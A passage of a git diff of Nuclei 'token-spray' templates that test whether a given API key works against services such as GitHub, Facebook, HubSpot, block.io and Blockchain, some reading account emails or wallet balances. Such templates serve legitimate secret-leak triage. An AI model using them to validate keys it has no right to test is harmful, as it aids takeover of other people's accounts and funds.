"https://io.adafruit.com/api/v2/user" + headers: + X-AIO-Key: "{{token}}" + matchers: + - type: word + part: body + words: + - '"username":' + - '"id":' + condition: and diff --git a/nuclei-templates/Other/api-adafruit-io.yaml b/nuclei-templates/Other/api-adafruit-io.yaml deleted file mode 100644 index 5fc0e8d40c..0000000000 --- a/nuclei-templates/Other/api-adafruit-io.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-adafruit-io - -info: - name: Adafruit IO API Test - author: dwisiswant0 - severity: info - reference: https://io.adafruit.com/api/docs/ - tags: token-spray,adafruit - -self-contained: true -requests: - - method: GET - path: - - "https://io.adafruit.com/api/v2/user" - headers: - X-AIO-Key: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"username":' - - '"id":' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-alienvault-389.yaml b/nuclei-templates/Other/api-alienvault-389.yaml new file mode 100644 index 0000000000..8bfd4447da --- /dev/null +++ b/nuclei-templates/Other/api-alienvault-389.yaml @@ -0,0 +1,26 @@ +id: api-alienvault + +info: + name: AlienVault Open Threat Exchange (OTX) API Test + author: daffainfo + severity: info + reference: + - https://otx.alienvault.com/api + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md + tags: token-spray,alienvault + +self-contained: true +requests: + - raw: + - | + GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 + Host: otx.alienvault.com + X-OTX-API-KEY: {{token}} + + matchers: + - type: word + part: body + words: + - '"$schema":' + - '"properties":' + condition: and diff --git a/nuclei-templates/Other/api-alienvault-390.yaml b/nuclei-templates/Other/api-alienvault-390.yaml deleted file mode 100644 index d0e5ba33ae..0000000000 --- a/nuclei-templates/Other/api-alienvault-390.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-alienvault - -info: - name: AlienVault Open Threat Exchange (OTX) API Test - author: daffainfo - severity: info - reference: - - https://otx.alienvault.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md - tags: token-spray,alienvault,exchange - -self-contained: true -requests: - - raw: - - | - GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 - Host: otx.alienvault.com - X-OTX-API-KEY: {{token}} - - matchers: - - type: word - part: body - words: - - '"$schema":' - - '"properties":' - condition: and diff --git a/nuclei-templates/Other/api-asana.yaml b/nuclei-templates/Other/api-asana.yaml deleted file mode 100644 index 9608f3c236..0000000000 --- a/nuclei-templates/Other/api-asana.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-asana - -info: - name: Asana API Test - author: zzeitlin - reference: https://developers.asana.com/docs/using-terminal - severity: info - tags: token-spray,asana - -self-contained: true -requests: - - method: GET - path: - - "https://app.asana.com/api/1.0/users/me" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - 'data:' - - 'email' - - 'name' - condition: and diff --git a/nuclei-templates/Other/api-bible-394.yaml b/nuclei-templates/Other/api-bible-394.yaml deleted file mode 100644 index 85858a2c68..0000000000 --- a/nuclei-templates/Other/api-bible-394.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-bible -info: - name: API.Bible API Test - author: daffainfo - severity: info - reference: - - https://docs.api.bible - - https://github.com/daffainfo/all-about-apikey/blob/main/Books/API%20Bible.md - tags: token-spray,bible -self-contained: true -requests: - - method: GET - path: - - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3" - headers: - api-key: "{{token}}" - matchers: - - type: word - part: body - words: - - "orgId" - - "bookId" - - "bibleId" - condition: and diff --git a/nuclei-templates/Other/api-bible.yaml b/nuclei-templates/Other/api-bible.yaml new file mode 100644 index 0000000000..9e47277d90 --- /dev/null +++ b/nuclei-templates/Other/api-bible.yaml @@ -0,0 +1,28 @@ +id: api-bible + +info: + name: API.Bible API Test + author: daffainfo + severity: info + description: Everything you need from the Bible in one discoverable place + reference: + - https://docs.api.bible + - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible + tags: token-spray,bible + +self-contained: true +requests: + - method: GET + path: + - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3" + headers: + api-key: "{{token}}" + + matchers: + - type: word + part: body + words: + - "orgId" + - "bookId" + - "bibleId" + condition: and diff --git a/nuclei-templates/Other/api-bitly.yaml b/nuclei-templates/Other/api-bitly.yaml new file mode 100644 index 0000000000..1764877c04 --- /dev/null +++ b/nuclei-templates/Other/api-bitly.yaml @@ -0,0 +1,17 @@ +id: api-bitly +info: + name: Bitly API Test + author: zzeitlin + reference: https://dev.bitly.com/api-reference + severity: info + tags: token-spray,bitly +requests: + - method: GET + path: + - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" + matchers: + - type: word + part: body + negative: true + words: + - 'INVALID_ARG_ACCESS_TOKEN' diff --git a/nuclei-templates/Other/api-block-400.yaml b/nuclei-templates/Other/api-block-400.yaml deleted file mode 100644 index 9609fdbafb..0000000000 --- a/nuclei-templates/Other/api-block-400.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-block -info: - name: block.io API Test - author: daffainfo - severity: info - reference: - - https://block.io/docs/basic - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Block.md - tags: token-spray,block -self-contained: true -requests: - - method: GET - path: - - "https://block.io/api/v2/get_balance/?api_key={{token}}" - matchers: - - type: word - part: body - words: - - '"network"' - - '"available_balance"' - - '"pending_received_balance"' - condition: and diff --git a/nuclei-templates/Other/api-block.yaml b/nuclei-templates/Other/api-block.yaml new file mode 100644 index 0000000000..616a67dd9f --- /dev/null +++ b/nuclei-templates/Other/api-block.yaml @@ -0,0 +1,26 @@ +id: api-block + +info: + name: block.io API Test + author: daffainfo + severity: info + description: Bitcoin Payment, Wallet & Transaction Data + reference: + - https://block.io/docs/basic + - https://github.com/daffainfo/all-about-apikey/tree/main/block + tags: token-spray,block + +self-contained: true +requests: + - method: GET + path: + - "https://block.io/api/v2/get_balance/?api_key={{token}}" + + matchers: + - type: word + part: body + words: + - '"network"' + - '"available_balance"' + - '"pending_received_balance"' + condition: and diff --git a/nuclei-templates/Other/api-blockchain-398.yaml b/nuclei-templates/Other/api-blockchain-398.yaml new file mode 100644 index 0000000000..ab15d9dace --- /dev/null +++ b/nuclei-templates/Other/api-blockchain-398.yaml @@ -0,0 +1,28 @@ +id: api-blockchain +info: + name: Blockchain API Test + author: daffainfo + severity: info + reference: + - https://api.blockchain.com/v3/#/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md + classification: + cwe-id: CWE-200 + tags: token-spray,blockchain +self-contained: true +requests: + - raw: + - | + GET https://api.blockchain.com/v3/exchange/accounts HTTP/1.1 + Host: api.blockchain.com + X-API-Token: {{token}} + matchers: + - type: word + part: body + words: + - '"currency"' + - '"balance"' + - '"available"' + condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/Other/api-blockchain.yaml b/nuclei-templates/Other/api-blockchain.yaml deleted file mode 100644 index 4f027d84d3..0000000000 --- a/nuclei-templates/Other/api-blockchain.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-blockchain - -info: - name: Blockhain API Test - author: daffainfo - severity: info - reference: - - https://api.blockchain.com/v3/#/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md - tags: token-spray,blockchain - -self-contained: true -requests: - - raw: - - | - GET https://api.blockchain.com/v3/exchange/accounts HTTP/1.1 - Host: api.blockchain.com - X-API-Token: {{token}} - - matchers: - - type: word - part: body - words: - - '"currency"' - - '"balance"' - - '"available"' - condition: and diff --git a/nuclei-templates/Other/api-buildkite.yaml b/nuclei-templates/Other/api-buildkite.yaml index 7855f0b53b..fe68654528 100644 --- a/nuclei-templates/Other/api-buildkite.yaml +++ b/nuclei-templates/Other/api-buildkite.yaml @@ -1,25 +1,18 @@ id: api-buildkite - info: name: Buildkite API Test author: zzeitlin reference: https://buildkite.com/docs/apis/rest-api/user severity: info tags: token-spray,buildkite - -self-contained: true requests: - method: GET path: - "https://api.buildkite.com/v2/user" headers: Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"id":' - - '"graphql_id":' - - '"email":' - condition: and \ No newline at end of file + - type: status + status: + - 401 + negative: true diff --git a/nuclei-templates/Other/api-buttercms-403.yaml b/nuclei-templates/Other/api-buttercms-403.yaml deleted file mode 100644 index cb2e1f1638..0000000000 --- a/nuclei-templates/Other/api-buttercms-403.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: api-buttercms -info: - name: ButterCMS API Test - author: zzeitlin - reference: https://buttercms.com/docs/api/#introduction - severity: info - tags: token-spray,buttercms -requests: - - method: GET - path: - - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" - matchers: - - type: status - status: - - 401 - negative: true diff --git a/nuclei-templates/Other/api-calendly-404.yaml b/nuclei-templates/Other/api-calendly-404.yaml index 648bfea8b1..aabbafcdce 100644 --- a/nuclei-templates/Other/api-calendly-404.yaml +++ b/nuclei-templates/Other/api-calendly-404.yaml @@ -1,17 +1,25 @@ id: api-calendly + info: name: Calendly API Test author: zzeitlin reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me severity: info - tags: token-spray,calendly + + +self-contained: true requests: - method: GET path: - "https://calendly.com/api/v1/users/me" headers: X-Token: "{{token}}" + matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"data":' + - '"id":' + - '"email":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-circleci-405.yaml b/nuclei-templates/Other/api-circleci-405.yaml new file mode 100644 index 0000000000..4d0fc2c4cd --- /dev/null +++ b/nuclei-templates/Other/api-circleci-405.yaml @@ -0,0 +1,15 @@ +id: api-circleci +info: + name: CircleCI API Test + author: zzeitlin + reference: https://circleci.com/docs/api/v1 + severity: info + tags: token-spray,circle,circleci +requests: + - method: GET + path: + - "https://circleci.com/api/v1.1/me?circle-token={{token}}" + matchers: + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-coinapi-408.yaml b/nuclei-templates/Other/api-coinapi-408.yaml new file mode 100644 index 0000000000..12c7339245 --- /dev/null +++ b/nuclei-templates/Other/api-coinapi-408.yaml @@ -0,0 +1,24 @@ +id: api-coinapi +info: + name: CoinAPI API Test + author: daffainfo + severity: info + reference: + - https://docs.coinapi.io/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/CoinAPI.md + tags: token-spray,coinapi +self-contained: true +requests: + - raw: + - | + GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 + Host: rest.coinapi.io + X-CoinAPI-Key: {{token}} + matchers: + - type: word + part: body + words: + - '"exchange_id":' + - '"website":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-coinapi.yaml b/nuclei-templates/Other/api-coinapi.yaml deleted file mode 100644 index e4a2e44374..0000000000 --- a/nuclei-templates/Other/api-coinapi.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-coinapi - -info: - name: CoinAPI API Test - author: daffainfo - severity: info - description: All Currency Exchanges integrate under a single api - reference: - - https://docs.coinapi.io/ - - https://github.com/daffainfo/all-about-apikey/tree/main/coinapi - tags: token-spray,coinapi - -self-contained: true -requests: - - raw: - - | - GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 - Host: rest.coinapi.io - X-CoinAPI-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"exchange_id":' - - '"website":' - - '"name":' - condition: and diff --git a/nuclei-templates/Other/api-cooperhewitt-409.yaml b/nuclei-templates/Other/api-cooperhewitt-409.yaml deleted file mode 100644 index c54d64e093..0000000000 --- a/nuclei-templates/Other/api-cooperhewitt-409.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-cooperhewitt - -info: - name: Cooper Hewitt API - author: daffainfo - severity: info - reference: - - https://collection.cooperhewitt.org/api/methods/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md - tags: token-spray,cooperhewitt - -self-contained: true -requests: - - method: GET - path: - - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" - - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-cooperhewitt-410.yaml b/nuclei-templates/Other/api-cooperhewitt-410.yaml new file mode 100644 index 0000000000..0da30b58ee --- /dev/null +++ b/nuclei-templates/Other/api-cooperhewitt-410.yaml @@ -0,0 +1,25 @@ +id: api-cooperhewitt + +info: + name: Cooper Hewitt API + author: daffainfo + severity: info + reference: + - https://collection.cooperhewitt.org/api/methods/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md + tags: token-spray,cooperhewitt + +self-contained: true +requests: + - method: GET + path: + - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" + + matchers: + - type: word + part: body + words: + - '"stat":' + - '"formats":' + - '"default_format":' + condition: and diff --git a/nuclei-templates/Other/api-dbt-413.yaml b/nuclei-templates/Other/api-dbt-413.yaml new file mode 100644 index 0000000000..1e4f804b0c --- /dev/null +++ b/nuclei-templates/Other/api-dbt-413.yaml @@ -0,0 +1,24 @@ +id: api-dbt +info: + name: dbt Cloud API Test + author: dwisiswant0 + severity: info + reference: + - https://docs.getdbt.com/docs/introduction + tags: token-spray,dbt +self-contained: true +requests: + - method: GET + path: + - "https://cloud.getdbt.com/api/v2/accounts/" + headers: + Content-Type: application/json + Authorization: Token {{token}} + matchers: + - type: word + part: body + words: + - "Invalid token" + - "Authentication credentials were not provided." + condition: or + negative: true diff --git a/nuclei-templates/Other/api-dbt.yaml b/nuclei-templates/Other/api-dbt.yaml deleted file mode 100644 index 8d19b5b055..0000000000 --- a/nuclei-templates/Other/api-dbt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-dbt - -info: - name: dbt Cloud API Test - author: dwisiswant0 - severity: info - reference: https://docs.getdbt.com/docs/introduction - tags: token-spray,dbt - -self-contained: true -requests: - - method: GET - path: - - "https://cloud.getdbt.com/api/v2/accounts/" - headers: - Content-Type: application/json - Authorization: Token {{token}} - - matchers: - - type: word - part: body - words: - - "Invalid token" - - "Authentication credentials were not provided." - condition: or - negative: true diff --git a/nuclei-templates/Other/api-debounce-414.yaml b/nuclei-templates/Other/api-debounce-414.yaml deleted file mode 100644 index 521abd8fd3..0000000000 --- a/nuclei-templates/Other/api-debounce-414.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-debounce -info: - name: DeBounce API Test - author: 0ri2N - severity: info - reference: - - https://developers.debounce.io/reference/api-key-authentication - - https://debounce.io - tags: debounce,token-spray -self-contained: true -requests: - - method: GET - path: - - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh" - matchers: - - type: word - part: body - words: - - '"balance":' - - '"success":' - - '"debounce":' - condition: and diff --git a/nuclei-templates/Other/api-debounce.yaml b/nuclei-templates/Other/api-debounce.yaml new file mode 100644 index 0000000000..2ed95d091b --- /dev/null +++ b/nuclei-templates/Other/api-debounce.yaml @@ -0,0 +1,25 @@ +id: api-debounce + +info: + name: DeBounce API Test + author: 0ri2N + severity: info + reference: + - https://developers.debounce.io/reference/api-key-authentication + - https://debounce.io + tags: debounce,token-spray + +self-contained: true +requests: + - method: GET + path: + - "https://api.debounce.io/v1/?api={{token}}&email=test@example.com" + + matchers: + - type: word + part: body + words: + - '"balance":' + - '"success":' + - '"debounce":' + condition: and diff --git a/nuclei-templates/Other/api-deviantart.yaml b/nuclei-templates/Other/api-deviantart.yaml deleted file mode 100644 index 87013947a1..0000000000 --- a/nuclei-templates/Other/api-deviantart.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: api-deviantart -info: - name: DeviantArt API Test - author: zzeitlin - reference: https://www.deviantart.com/developers/authentication - severity: info - tags: token-spray,deviantart -requests: - - method: POST - path: - - "https://www.deviantart.com/api/v1/oauth2/placebo" - body: "access_token={{token}}" - matchers: - - type: word - part: body - words: - - '"status":"error"' - negative: true diff --git a/nuclei-templates/Other/api-dribbble.yaml b/nuclei-templates/Other/api-dribbble-417.yaml similarity index 100% rename from nuclei-templates/Other/api-dribbble.yaml rename to nuclei-templates/Other/api-dribbble-417.yaml diff --git a/nuclei-templates/Other/api-dropbox.yaml b/nuclei-templates/Other/api-dropbox-418.yaml similarity index 100% rename from nuclei-templates/Other/api-dropbox.yaml rename to nuclei-templates/Other/api-dropbox-418.yaml diff --git a/nuclei-templates/Other/api-europeana-420.yaml b/nuclei-templates/Other/api-europeana-420.yaml new file mode 100644 index 0000000000..c0767ce8d7 --- /dev/null +++ b/nuclei-templates/Other/api-europeana-420.yaml @@ -0,0 +1,25 @@ +id: api-europeana + +info: + name: Europeana API Test + author: daffainfo + severity: info + reference: + - https://pro.europeana.eu/page/search + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md + tags: token-spray,europeana + +self-contained: true +requests: + - method: GET + path: + - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" + + matchers: + - type: word + part: body + words: + - 'success' + - 'apikey' + - 'action' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-europeana.yaml b/nuclei-templates/Other/api-europeana.yaml deleted file mode 100644 index 520c83775d..0000000000 --- a/nuclei-templates/Other/api-europeana.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-europeana - -info: - name: Europeana API Test - author: daffainfo - severity: info - reference: - - https://pro.europeana.eu/page/search - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md - tags: token-spray,europeana - -self-contained: true -requests: - - method: GET - path: - - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" - - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-facebook-422.yaml b/nuclei-templates/Other/api-facebook-422.yaml deleted file mode 100644 index 07bfb85fbb..0000000000 --- a/nuclei-templates/Other/api-facebook-422.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-facebook -info: - name: Facebook API Test - author: dwisiswant0 - severity: info - reference: - - https://developers.facebook.com/tools/explorer/ - tags: token-spray,facebook -self-contained: true -requests: - - method: GET - path: - - "https://graph.facebook.com/me?access_token={{token}}" - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'application/json' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-facebook.yaml b/nuclei-templates/Other/api-facebook.yaml new file mode 100644 index 0000000000..8143cbc92c --- /dev/null +++ b/nuclei-templates/Other/api-facebook.yaml @@ -0,0 +1,25 @@ +id: api-facebook + +info: + name: Facebook API Test + author: dwisiswant0 + reference: https://developers.facebook.com/tools/explorer/ + severity: info + tags: token-spray,facebook + +self-contained: true +requests: + - method: GET + path: + - "https://graph.facebook.com/me?access_token={{token}}" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-festivo-425.yaml b/nuclei-templates/Other/api-festivo-425.yaml new file mode 100644 index 0000000000..c3b259852a --- /dev/null +++ b/nuclei-templates/Other/api-festivo-425.yaml @@ -0,0 +1,22 @@ +id: api-festivo +info: + name: Festivo API Test + author: daffainfo + severity: info + reference: + - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md + tags: token-spray,festivo +self-contained: true +requests: + - method: GET + path: + - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" + matchers: + - type: word + part: body + words: + - '"id":' + - '"holidays":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-festivo.yaml b/nuclei-templates/Other/api-festivo.yaml deleted file mode 100644 index 3911ce2636..0000000000 --- a/nuclei-templates/Other/api-festivo.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-festivo - -info: - name: Festivo API Test - author: daffainfo - severity: info - description: Fastest and most advanced public holiday and observance service on the market - reference: - - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays - tags: token-spray,festivo - -self-contained: true -requests: - - method: GET - path: - - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" - - matchers: - - type: word - part: body - words: - - '"id":' - - '"holidays":' - - '"name":' - condition: and diff --git a/nuclei-templates/Other/api-github-429.yaml b/nuclei-templates/Other/api-github-429.yaml new file mode 100644 index 0000000000..bff431e770 --- /dev/null +++ b/nuclei-templates/Other/api-github-429.yaml @@ -0,0 +1,24 @@ +id: api-github + +info: + name: GitHub API Test + author: zzeitlin + reference: https://docs.github.com/en/rest/reference/users + severity: info + + +self-contained: true +requests: + - method: GET + path: + - "https://api.github.com/user" + headers: + Authorization: Basic {{base64('user:' + token)}} + + matchers: + - type: word + part: body + words: + - '"login":' + - '"avatar_url":' + condition: and diff --git a/nuclei-templates/Other/api-github.yaml b/nuclei-templates/Other/api-github.yaml deleted file mode 100644 index 764b42e28c..0000000000 --- a/nuclei-templates/Other/api-github.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-github - -info: - name: GitHub API Test - author: zzeitlin - reference: https://docs.github.com/en/rest/reference/users - severity: info - tags: token-spray,github - -self-contained: true -requests: - - method: GET - path: - - "https://api.github.com/user" - headers: - Authorization: Basic {{base64('user:' + token)}} - - matchers: - - type: word - part: body - words: - - '"login":' - - '"avatar_url":' - condition: and diff --git a/nuclei-templates/Other/api-gitlab-431.yaml b/nuclei-templates/Other/api-gitlab-430.yaml similarity index 100% rename from nuclei-templates/Other/api-gitlab-431.yaml rename to nuclei-templates/Other/api-gitlab-430.yaml diff --git a/nuclei-templates/Other/api-heroku.yaml b/nuclei-templates/Other/api-heroku.yaml deleted file mode 100644 index 7cd418b045..0000000000 --- a/nuclei-templates/Other/api-heroku.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-heroku -info: - name: Heroku API Test - author: zzeitlin - reference: https://devcenter.heroku.com/articles/platform-api-quickstart#calling-the-api - severity: info - tags: token-spray,heroku -requests: - - method: POST - path: - - "https://api.heroku.com/apps" - headers: - Accept: application/vnd.heroku+json; version=3 - Authorization: Bearer {{token}} - matchers: - - type: status - status: - - 200 - - 201 - - 202 - - 206 - condition: or diff --git a/nuclei-templates/Other/api-hirak-rates-436.yaml b/nuclei-templates/Other/api-hirak-rates-436.yaml new file mode 100644 index 0000000000..22ecc89a2f --- /dev/null +++ b/nuclei-templates/Other/api-hirak-rates-436.yaml @@ -0,0 +1,23 @@ +id: api-hirak-rates +info: + name: Hirak Exchange Rates API Test + author: daffainfo + severity: info + reference: + - https://rates.hirak.site/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Hirak%20Exchange%20Rates.md + tags: token-spray,hirak +self-contained: true +requests: + - method: GET + path: + - "https://rates.hirak.site/stat/?token={{token}}" + matchers: + - type: word + part: body + words: + - '"token":' + - '"plan":' + - '"hits":' + - '"remain":' + condition: and diff --git a/nuclei-templates/Other/api-hirak-rates.yaml b/nuclei-templates/Other/api-hirak-rates.yaml deleted file mode 100644 index 6d61403334..0000000000 --- a/nuclei-templates/Other/api-hirak-rates.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-hirak-rates - -info: - name: Hirak Exchange Rates API Test - author: daffainfo - severity: info - description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits - reference: - - https://rates.hirak.site/ - - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates - tags: token-spray,hirak - -self-contained: true -requests: - - method: GET - path: - - "https://rates.hirak.site/stat/?token={{token}}" - - matchers: - - type: word - part: body - words: - - '"token":' - - '"plan":' - - '"hits":' - - '"remain":' - condition: and diff --git a/nuclei-templates/Other/api-hubspot-437.yaml b/nuclei-templates/Other/api-hubspot-437.yaml new file mode 100644 index 0000000000..73e525fb35 --- /dev/null +++ b/nuclei-templates/Other/api-hubspot-437.yaml @@ -0,0 +1,18 @@ +id: api-hubspot +info: + name: HubSpot API Test + author: zzeitlin + reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners + severity: info + tags: token-spray,hubspot +requests: + - method: GET + path: + - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" + - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" + matchers: + - type: word + part: body + words: + - 'error' + negative: true diff --git a/nuclei-templates/Other/api-hubspot.yaml b/nuclei-templates/Other/api-hubspot.yaml deleted file mode 100644 index 4526b146f6..0000000000 --- a/nuclei-templates/Other/api-hubspot.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-hubspot - -info: - name: HubSpot API Test - author: zzeitlin - severity: info - reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners - tags: token-spray,hubspot - -self-contained: true -requests: - - method: GET - path: - - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - - "https://api.hubapi.com/contacts/v1/lists/static?count=3&hapikey={{token}}" - - matchers-condition: or - matchers: - - type: word - part: body - words: - - '"portalId":' - - '"ownerId":' - condition: and - - - type: word - part: body - words: - - '"metaData":' - - '"portalId":' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-iconfinder-439.yaml b/nuclei-templates/Other/api-iconfinder-438.yaml similarity index 100% rename from nuclei-templates/Other/api-iconfinder-439.yaml rename to nuclei-templates/Other/api-iconfinder-438.yaml diff --git a/nuclei-templates/Other/api-improvmx-440.yaml b/nuclei-templates/Other/api-improvmx-440.yaml deleted file mode 100644 index 7d16536f15..0000000000 --- a/nuclei-templates/Other/api-improvmx-440.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-improvmx -info: - name: ImprovMX API Test - author: daffainfo - severity: info - reference: - - https://improvmx.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md - tags: token-spray,improvmx -self-contained: true -requests: - - raw: - - | - GET https://api.improvmx.com/v3/account HTTP/1.1 - Authorization: Basic {{base64(':' + token)}} - Host: api.improvmx.com - redirects: true - max-redirects: 1 - matchers: - - type: word - part: body - words: - - '"billing_email":' - - '"cancels_on":' - - '"company_details":' - condition: and diff --git a/nuclei-templates/Other/api-improvmx.yaml b/nuclei-templates/Other/api-improvmx.yaml new file mode 100644 index 0000000000..fb6c00f0d9 --- /dev/null +++ b/nuclei-templates/Other/api-improvmx.yaml @@ -0,0 +1,30 @@ +id: api-improvmx + +info: + name: ImprovMX API Test + author: daffainfo + severity: info + description: API for free email forwarding service + reference: + - https://improvmx.com/api + - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx + tags: token-spray,improvmx + +self-contained: true +requests: + - raw: + - | + GET https://api.improvmx.com/v3/account HTTP/1.1 + Authorization: Basic {{base64(':' + token)}} + Host: api.improvmx.com + + redirects: true + max-redirects: 1 + matchers: + - type: word + part: body + words: + - '"billing_email":' + - '"cancels_on":' + - '"company_details":' + condition: and diff --git a/nuclei-templates/Other/api-instagram.yaml b/nuclei-templates/Other/api-instagram.yaml index fc463c8bac..552c59fd50 100644 --- a/nuclei-templates/Other/api-instagram.yaml +++ b/nuclei-templates/Other/api-instagram.yaml @@ -1,23 +1,15 @@ id: api-instagramgraph - info: name: Instagram Graph API Test author: zzeitlin reference: https://developers.facebook.com/docs/instagram-api/getting-started severity: info tags: token-spray,instagram,graph - -self-contained: true requests: - method: GET path: - - "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}" - + - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" matchers: - - type: word - part: body - words: - - '"data":' - - '"access_token":' - - '"name":' - condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-instatus-442.yaml b/nuclei-templates/Other/api-instatus-442.yaml new file mode 100644 index 0000000000..fb0b8dbdd4 --- /dev/null +++ b/nuclei-templates/Other/api-instatus-442.yaml @@ -0,0 +1,25 @@ +id: api-instatus +info: + name: Instatus API Test + author: daffainfo + severity: info + reference: + - https://instatus.com/help/api + - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Instatus.md + tags: token-spray,instatus +self-contained: true +requests: + - method: GET + path: + - "https://api.instatus.com/v1/pages" + headers: + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - '"id":' + - '"subdomain":' + - '"name":' + - '"logoUrl":' + condition: and diff --git a/nuclei-templates/Other/api-instatus.yaml b/nuclei-templates/Other/api-instatus.yaml deleted file mode 100644 index 1175f1b8b3..0000000000 --- a/nuclei-templates/Other/api-instatus.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: api-instatus - -info: - name: Instatus API Test - author: daffainfo - severity: info - description: Post to and update maintenance and incidents on your status page through an HTTP REST API - reference: - - https://instatus.com/help/api - - https://github.com/daffainfo/all-about-apikey/tree/main/instatus - tags: token-spray,instatus - -self-contained: true -requests: - - method: GET - path: - - "https://api.instatus.com/v1/pages" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - '"id":' - - '"subdomain":' - - '"name":' - - '"logoUrl":' - condition: and diff --git a/nuclei-templates/Other/api-iterable.yaml b/nuclei-templates/Other/api-iterable.yaml deleted file mode 100644 index b4d465a644..0000000000 --- a/nuclei-templates/Other/api-iterable.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: api-iterable -info: - name: Iterable API Test - author: zzeitlin - reference: https://api.iterable.com/api/docs - severity: info - tags: token-spray,iterable -requests: - - method: GET - path: - - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" - headers: - Api_Key: "{{token}}" - matchers: - - type: word - part: body - negative: true - words: - - 'BadApiKey' - - 